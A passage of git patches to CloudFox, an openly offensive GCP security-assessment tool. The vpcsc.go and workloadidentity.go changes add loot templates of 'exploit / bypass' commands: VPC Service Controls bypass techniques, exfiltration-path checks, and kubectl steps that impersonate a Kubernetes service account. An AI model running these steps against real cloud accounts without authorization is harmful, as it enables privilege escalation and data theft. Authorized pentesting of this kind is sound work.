------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Project: %s\n"+ "# Network: %s -> Peer Network: %s\n"+ "# Peer Project: %s\n"+ diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go index 36a17bc1..92ff8ef0 100644 --- a/gcp/commands/vpcsc.go +++ b/gcp/commands/vpcsc.go @@ -162,9 +162,9 @@ func (m *VPCSCModule) addAllToLoot() { // Add policies to loot for _, policy := range m.Policies { m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# POLICY: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Title: %s\n"+ "# Parent: %s\n"+ "\n# Describe access policy:\n"+ @@ -181,25 +181,77 @@ func (m *VPCSCModule) addAllToLoot() { // Add perimeters to loot for _, perimeter := range m.Perimeters { m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# PERIMETER: %s (Policy: %s)\n"+ - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Title: %s\n"+ "# Type: %s\n"+ "# Resources: %d\n"+ "# Restricted Services: %d\n"+ "# Ingress Policies: %d\n"+ "# Egress Policies: %d\n"+ - "\n# Describe perimeter:\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe perimeter:\n"+ "gcloud access-context-manager perimeters describe %s --policy=%s\n\n"+ "# List protected resources:\n"+ - "gcloud access-context-manager perimeters describe %s --policy=%s --format=\"value(status.resources)\"\n\n", + "gcloud access-context-manager perimeters describe %s --policy=%s --format=\"value(status.resources)\"\n\n"+ + "# List restricted services:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.restrictedServices'\n\n"+ + "# List ingress policies (who can access from outside):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.ingressPolicies'\n\n"+ + "# List egress policies (what can leave the perimeter):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.egressPolicies'\n\n", perimeter.Name, perimeter.PolicyName, perimeter.Title, perimeter.PerimeterType, len(perimeter.Resources), len(perimeter.RestrictedServices), perimeter.IngressPolicyCount, perimeter.EgressPolicyCount, perimeter.Name, perimeter.PolicyName, perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + ) + + // Exploit/bypass commands + m.LootMap["vpcsc-commands"].Contents += "# === EXPLOIT / BYPASS COMMANDS ===\n\n" + + if perimeter.IngressPolicyCount > 0 { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# Ingress policies exist - check for overly permissive access:\n"+ + "# Review which identities/access levels are allowed ingress\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.ingressPolicies[] | {from: .ingressFrom, to: .ingressTo}'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + if perimeter.EgressPolicyCount > 0 { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# Egress policies exist - check for data exfil paths:\n"+ + "# Review what services/resources can send data outside the perimeter\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.egressPolicies[] | {from: .egressFrom, to: .egressTo}'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + if perimeter.PerimeterType == "PERIMETER_TYPE_BRIDGE" { + m.LootMap["vpcsc-commands"].Contents += "# [FINDING] This is a BRIDGE perimeter - it connects two perimeters\n" + + "# Bridge perimeters can be used to exfiltrate data between perimeters\n" + + "# Check which perimeters are bridged and what services flow between them\n\n" + } + + // Common bypass techniques + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# VPC-SC Bypass Techniques:\n"+ + "# 1. If you have access to a project INSIDE the perimeter, use it as a pivot\n"+ + "# 2. Check if any access levels use overly permissive IP ranges\n"+ + "# 3. Look for services NOT in the restricted list (data can flow through unrestricted services)\n"+ + "# 4. Check for ingress policies that allow specific identities you control\n"+ + "# 5. Use Cloud Shell (if accessible) - it may bypass VPC-SC\n\n"+ + "# Test if you're inside the perimeter:\n"+ + "gcloud storage ls gs://BUCKET_IN_PERIMETER 2>&1 | grep -i 'Request is prohibited by organization'\n\n"+ + "# Check dry-run mode (violations logged but not blocked):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.useExplicitDryRunSpec'\n\n", + perimeter.Name, perimeter.PolicyName, ) } @@ -215,9 +267,9 @@ func (m *VPCSCModule) addAllToLoot() { } m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# ACCESS LEVEL: %s (Policy: %s)\n"+ - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Title: %s\n"+ "# IP Subnets: %s\n"+ "# Regions: %s\n"+ diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index b0fb5b19..6cd6814f 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1273,19 +1273,19 @@ func (m *WhoAmIModule) initializeLootFiles() { if m.Extended { m.LootMap["whoami-impersonation"] = &internal.LootFile{ Name: "whoami-impersonation", - Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["whoami-privesc"] = &internal.LootFile{ Name: "whoami-privesc", - Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["whoami-data-exfil"] = &internal.LootFile{ Name: "whoami-data-exfil", - Contents: "# Data Exfiltration Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + Contents: "# Data Exfiltration Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["whoami-lateral-movement"] = &internal.LootFile{ Name: "whoami-lateral-movement", - Contents: "# Lateral Movement Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + Contents: "# Lateral Movement Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } // Playbook files with detailed exploitation techniques m.LootMap["whoami-privesc-playbook"] = &internal.LootFile{ @@ -1973,8 +1973,8 @@ func (m *WhoAmIModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { // Include loot files that have content beyond the header comments - // Headers end with "# WARNING: Only use with proper authorization!\n\n" - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { + // Headers end with "# WARNING: Only use with proper authorization\n\n" + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index 995e0298..fd63d2b3 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -340,13 +340,14 @@ func (m *WorkloadIdentityModule) addClusterToLoot(projectID string, cwi ClusterW } if cwi.WorkloadPoolEnabled { lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# GKE CLUSTER: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Location: %s\n"+ "# Workload Pool: %s\n"+ - "# Node Pools with WI: %d/%d\n"+ - "\n# Get cluster credentials:\n"+ + "# Node Pools with WI: %d/%d\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Get cluster credentials:\n"+ "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", cwi.ClusterName, cwi.Location, @@ -371,9 +372,9 @@ func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding Work } lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# K8s SA BINDING: %s/%s -> %s%s\n"+ - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Cluster: %s (%s)\n", binding.KubernetesNS, binding.KubernetesSA, @@ -390,8 +391,9 @@ func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding Work ) } + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( - "\n# To exploit, create pod with this service account:\n"+ + "# To exploit, create pod with this service account:\n"+ "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", binding.KubernetesSA, From 47d69d870f9a1efa55777ea690bf6b71707e1eb4 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 20 Feb 2026 12:59:43 -0500 Subject: [PATCH 42/48] remove alias due to conflict --- gcp/commands/crossproject.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 673f7346..d0fd1e62 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -14,7 +14,7 @@ import ( var GCPCrossProjectCommand = &cobra.Command{ Use: globals.GCP_CROSSPROJECT_MODULE_NAME, - Aliases: []string{"cross-project", "xproject", "lateral"}, + Aliases: []string{"cross-project", "xproject"}, Short: "Analyze cross-project access patterns for lateral movement", Long: `Analyze cross-project access patterns to identify lateral movement paths and data flows. From f2d4b7c535f3cdfe346c1f10dad8a6a8b2b55b5b Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 20 Feb 2026 13:06:07 -0500 Subject: [PATCH 43/48] updated readme --- README.md | 67 +++++-------------------------------------------------- 1 file changed, 6 insertions(+), 61 deletions(-) diff --git a/README.md b/README.md index c808d455..cb66a74d 100644 --- a/README.md +++ b/README.md @@ -54,7 +54,7 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | - | - | | AWS | 34 | | Azure | 4 | -| GCP | 58 | +| GCP | 60 | | Kubernetes | Support Planned | @@ -208,8 +208,7 @@ For detailed setup instructions, see the [GCP Setup Guide](https://github.com/Bi For detailed documentation on each GCP command, see the [GCP Commands Wiki](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands). -## Identity & Access Management -| Provider | Command Name | Description | +| Provider | Command Name | Description | - | - | - | | GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display identity context for the authenticated GCP user/service account | | GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Enumerate GCP IAM principals across organizations, folders, and projects | @@ -220,10 +219,8 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [resource-iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#resource-iam) | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | | GCP | [domain-wide-delegation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#domain-wide-delegation) | Find service accounts with Domain-Wide Delegation to Google Workspace | | GCP | [privesc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#privesc) | Identify privilege escalation paths in GCP projects | - -## Compute & Containers -| Provider | Command Name | Description | -| - | - | - | +| GCP | [hidden-admins](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#hidden-admins) | Identify principals who can modify IAM policies (hidden admins) | +| GCP | [identity-federation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#identity-federation) | Enumerate Workload Identity Federation (external identities) | | GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Enumerate GCP Compute Engine instances with security configuration | | GCP | [gke](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#gke) | Enumerate GKE clusters with security analysis | | GCP | [cloudrun](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudrun) | Enumerate Cloud Run services and jobs with security analysis | @@ -234,10 +231,7 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [dataflow](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataflow) | Enumerate Dataflow jobs and pipelines | | GCP | [notebooks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#notebooks) | Enumerate Vertex AI Workbench notebooks | | GCP | [workload-identity](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#workload-identity) | Enumerate GKE Workload Identity and Workload Identity Federation | - -## Storage & Databases -| Provider | Command Name | Description | -| - | - | - | +| GCP | [inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#inventory) | Quick resource inventory - works without Cloud Asset API | | GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Enumerate GCP Cloud Storage buckets with security configuration | | GCP | [bucket-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bucket-enum) | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | | GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Enumerate GCP BigQuery datasets and tables with security analysis | @@ -246,10 +240,6 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [bigtable](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable) | Enumerate Cloud Bigtable instances and tables | | GCP | [filestore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#filestore) | Enumerate Filestore NFS instances | | GCP | [memorystore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#memorystore) | Enumerate Memorystore (Redis) instances | - -## Networking -| Provider | Command Name | Description | -| - | - | - | | GCP | [vpc-networks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-networks) | Enumerate VPC Networks | | GCP | [firewall](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#firewall) | Enumerate VPC networks and firewall rules with security analysis | | GCP | [loadbalancers](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#loadbalancers) | Enumerate Load Balancers | @@ -257,10 +247,6 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [endpoints](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#endpoints) | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | | GCP | [private-service-connect](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#private-service-connect) | Enumerate Private Service Connect endpoints and service attachments | | GCP | [network-topology](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#network-topology) | Visualize VPC network topology, peering relationships, and trust boundaries | - -## Security & Compliance -| Provider | Command Name | Description | -| - | - | - | | GCP | [vpc-sc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-sc) | Enumerate VPC Service Controls | | GCP | [access-levels](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#access-levels) | Enumerate Access Context Manager access levels | | GCP | [cloud-armor](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloud-armor) | Enumerate Cloud Armor security policies and find weaknesses | @@ -270,61 +256,20 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Enumerate GCP Secret Manager secrets with security configuration | | GCP | [cert-manager](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cert-manager) | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | | GCP | [org-policies](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#org-policies) | Enumerate organization policies and identify security weaknesses | - -## CI/CD & Source Control -| Provider | Command Name | Description | -| - | - | - | | GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Enumerate GCP Artifact Registry and Container Registry with security configuration | | GCP | [cloudbuild](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudbuild) | Enumerate Cloud Build triggers and builds | | GCP | [source-repos](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#source-repos) | Enumerate Cloud Source Repositories | | GCP | [scheduler](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#scheduler) | Enumerate Cloud Scheduler jobs with security analysis | - -## Messaging & Events -| Provider | Command Name | Description | -| - | - | - | | GCP | [pubsub](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#pubsub) | Enumerate Pub/Sub topics and subscriptions with security analysis | - -## Logging & Monitoring -| Provider | Command Name | Description | -| - | - | - | | GCP | [logging](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging) | Enumerate Cloud Logging sinks and metrics with security analysis | -| GCP | [logging-gaps](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging-gaps) | Find resources with missing or incomplete logging | - -## Organization & Projects -| Provider | Command Name | Description | -| - | - | - | | GCP | [organizations](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#organizations) | Enumerate GCP organization hierarchy | | GCP | [asset-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#asset-inventory) | Enumerate Cloud Asset Inventory with optional dependency analysis | | GCP | [backup-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#backup-inventory) | Enumerate backup policies, protected resources, and identify backup gaps | - -## Attack Path Analysis - -CloudFox GCP uses a **unified attack path analysis** system that combines privilege escalation, lateral movement, and data exfiltration analysis. The three attack path modules share a common backend (`attackpathService`) that analyzes IAM policies across all 4 hierarchy levels: Organization → Folder → Project → Resource. - -### Attack Path Column - -CloudFox automatically loads FoxMapper graph data when available and shows attack path capabilities in module output. Run foxmapper first to populate the Attack Paths column: - -```bash -# First, generate the attack path graph -foxmapper gcp graph create -p my-project - -# Then run cloudfox modules - Attack Paths column will be populated automatically -cloudfox gcp instances -p my-project -cloudfox gcp serviceaccounts --all-projects -``` - -The **"Attack Paths"** column shows: `Yes (P:3 E:2 L:1)` where P=Privesc, E=Exfil, L=Lateral counts. If foxmapper hasn't been run, the column shows "run foxmapper". - -**Modules with Attack Paths column**: instances, serviceaccounts, functions, cloudrun, gke, composer, dataproc, dataflow, notebooks, cloudbuild, scheduler, appengine, service-agents - -| Provider | Command Name | Description | -| - | - | - | -| GCP | [privesc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#privesc) | Identify privilege escalation paths (SA impersonation, key creation, IAM modification) | | GCP | [lateral-movement](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#lateral-movement) | Map lateral movement paths, credential theft vectors, and pivot opportunities | | GCP | [data-exfiltration](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#data-exfiltration) | Identify data exfiltration paths, potential vectors, and missing security hardening | | GCP | [public-access](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#public-access) | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | | GCP | [cross-project](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cross-project) | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | +| GCP | [foxmapper](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper) | Run FoxMapper (graph-based IAM analysis) for privilege escalation path discovery | From 72cd367086e10ee8b78a548b732eb5e52fefede8 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 20 Feb 2026 16:12:28 -0500 Subject: [PATCH 44/48] fixed potential panics --- gcp/commands/pubsub.go | 1 + .../artifactRegistryService_test.go | 19 ++++++++++++------- gcp/services/oauthService/oauthService.go | 2 +- .../secretsService/secretsService_test.go | 3 ++- 4 files changed, 16 insertions(+), 9 deletions(-) diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index c2d68e0b..3bdef915 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -474,6 +474,7 @@ gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack sub.Name, sub.ProjectID, sub.Name, sub.ProjectID, sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, sub.Name, sub.Name, sub.ProjectID, sub.Name, sub.ProjectID, sub.Name, sub.Name, sub.ProjectID, diff --git a/gcp/services/artifactRegistryService/artifactRegistryService_test.go b/gcp/services/artifactRegistryService/artifactRegistryService_test.go index db90e10d..1a24e596 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService_test.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService_test.go @@ -157,7 +157,8 @@ func TestArtifacts(t *testing.T) { SizeBytes: "1024", ProjectID: "project1", Digest: "sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", - Updated: "1970-01-01 00:00:00 +0000 UTC", + URI: "us-central1-docker.pkg.dev/project1/repo1/image1@sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", + Version: "sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", }, }, expectError: false, @@ -215,12 +216,16 @@ func TestRepositories(t *testing.T) { }, expectedRepositories: []artifactRegistryService.RepositoryInfo{ { - Name: "projects/project1/locations/us-central1/repositories/repo1", - Format: "DOCKER", - Description: "Test repository", - SizeBytes: "0", - ProjectID: "project1", - Location: "us-central1", + Name: "projects/project1/locations/us-central1/repositories/repo1", + Format: "DOCKER", + Description: "Test repository", + SizeBytes: "0", + ProjectID: "project1", + Location: "us-central1", + Mode: "MODE_UNSPECIFIED", + EncryptionType: "Google-managed", + RegistryType: "artifact-registry", + PublicAccess: "Unknown", }, }, expectError: false, diff --git a/gcp/services/oauthService/oauthService.go b/gcp/services/oauthService/oauthService.go index 3f9fa5e7..46dab287 100644 --- a/gcp/services/oauthService/oauthService.go +++ b/gcp/services/oauthService/oauthService.go @@ -48,7 +48,7 @@ func (s *OAuthService) WhoAmI() (*Principal, error) { tokenInfo, err := queryTokenInfo(token.AccessToken) if err != nil { - return nil, fmt.Errorf(fmt.Sprintf("failed to retrieve metada of the token with error: %s", err.Error())) + return nil, fmt.Errorf("failed to retrieve metadata of the token with error: %w", err) } // Split the scope string into a slice of strings. scopes := strings.Split(tokenInfo.Scope, " ") diff --git a/gcp/services/secretsService/secretsService_test.go b/gcp/services/secretsService/secretsService_test.go index a8e63898..dca529fe 100644 --- a/gcp/services/secretsService/secretsService_test.go +++ b/gcp/services/secretsService/secretsService_test.go @@ -115,8 +115,9 @@ func TestSecrets(t *testing.T) { { Name: "projects/my-project/secrets/secret1", ProjectID: "my-project", - CreationTime: time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC).String(), + CreationTime: time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC).Format(time.RFC3339), Labels: map[string]string{"env": "test"}, + Rotation: "disabled", }, }, wantErr: false, From 8db014b136b5e213f1a492885ad9c90c304ec693 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Sat, 21 Feb 2026 14:12:23 -0500 Subject: [PATCH 45/48] updated foxmapper mappings --- gcp/commands/foxmapper.go | 78 ++++++++++++----- gcp/commands/privesc.go | 35 ++++++-- gcp/commands/whoami.go | 27 ++++-- .../foxmapperService/foxmapperService.go | 86 ++++++++++++++----- internal/gcp/foxmapper_cache.go | 4 + 5 files changed, 175 insertions(+), 55 deletions(-) diff --git a/gcp/commands/foxmapper.go b/gcp/commands/foxmapper.go index b594986e..f9c89345 100755 --- a/gcp/commands/foxmapper.go +++ b/gcp/commands/foxmapper.go @@ -257,7 +257,7 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje // Main table: principals with admin or path to admin // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops - mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops"} + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops", "Confidence"} var mainBody [][]string // First add admins @@ -275,6 +275,7 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje "-", "-", "-", + "-", }) } @@ -284,6 +285,7 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje shortestPath := "-" privescTo := "-" privescAdminLevel := "-" + confidence := "-" if len(paths) > 0 { bestPath := paths[0] shortestPath = strconv.Itoa(bestPath.HopCount) @@ -296,6 +298,12 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje privescTo = strings.TrimPrefix(privescTo, "user:") } + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + // Format privesc admin level destNode := fm.GetNode(bestPath.Destination) switch bestPath.AdminLevel { @@ -344,6 +352,7 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje privescTo, privescAdminLevel, shortestPath, + confidence, }) } @@ -395,27 +404,31 @@ func (m *FoxMapperModule) generatePathsLootContentForProject(projectID string, f if path.ScopeBlocked { scopeStatus = " [SCOPE-BLOCKED]" } + confidenceStatus := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceStatus = fmt.Sprintf(" [%s confidence]", path.Confidence) + } - sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n", - pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus, confidenceStatus)) // Show the path as a visual chain sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) for i, edge := range path.Edges { - if i < len(path.Edges)-1 { - sb.WriteString(" │\n") - } else { - sb.WriteString(" │\n") - } + sb.WriteString(" │\n") - scopeWarning := "" + annotations := "" if edge.ScopeBlocksEscalation { - scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE" + annotations = " ⚠️ BLOCKED BY OAUTH SCOPE" } else if edge.ScopeLimited { - scopeWarning = " ⚠️ scope-limited" + annotations = " ⚠️ scope-limited" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) } - sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning)) + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, annotations)) if edge.Resource != "" { sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) @@ -485,18 +498,25 @@ func (m *FoxMapperModule) generateLootContentForProject(projectID string, fm *fo sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.Confidence != "" && path.Confidence != "high" { + sb.WriteString(fmt.Sprintf(" Confidence: %s\n", path.Confidence)) + } if path.ScopeBlocked { sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") } sb.WriteString(" Path:\n") for i, edge := range path.Edges { - scopeInfo := "" + annotations := "" if edge.ScopeBlocksEscalation { - scopeInfo = " [BLOCKED BY SCOPE]" + annotations = " [BLOCKED BY SCOPE]" } else if edge.ScopeLimited { - scopeInfo = " [scope-limited]" + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) } - sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, scopeInfo)) + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) } sb.WriteString("\n") } @@ -520,7 +540,7 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri // Main table: principals with admin or path to admin // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops - mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops"} + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops", "Confidence"} var mainBody [][]string // First add admins @@ -538,6 +558,7 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri "-", "-", "-", + "-", }) } @@ -547,6 +568,7 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri shortestPath := "-" privescTo := "-" privescAdminLevel := "-" + confidence := "-" if len(paths) > 0 { bestPath := paths[0] shortestPath = strconv.Itoa(bestPath.HopCount) @@ -559,6 +581,12 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri privescTo = strings.TrimPrefix(privescTo, "user:") } + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + // Format privesc admin level destNode := m.FoxMapper.GetNode(bestPath.Destination) switch bestPath.AdminLevel { @@ -607,6 +635,7 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri privescTo, privescAdminLevel, shortestPath, + confidence, }) } @@ -753,18 +782,25 @@ func (m *FoxMapperModule) generateLootContent(identifier string) string { sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.Confidence != "" && path.Confidence != "high" { + sb.WriteString(fmt.Sprintf(" Confidence: %s\n", path.Confidence)) + } if path.ScopeBlocked { sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") } sb.WriteString(" Path:\n") for i, edge := range path.Edges { - scopeInfo := "" + annotations := "" if edge.ScopeBlocksEscalation { - scopeInfo = " [BLOCKED BY SCOPE]" + annotations = " [BLOCKED BY 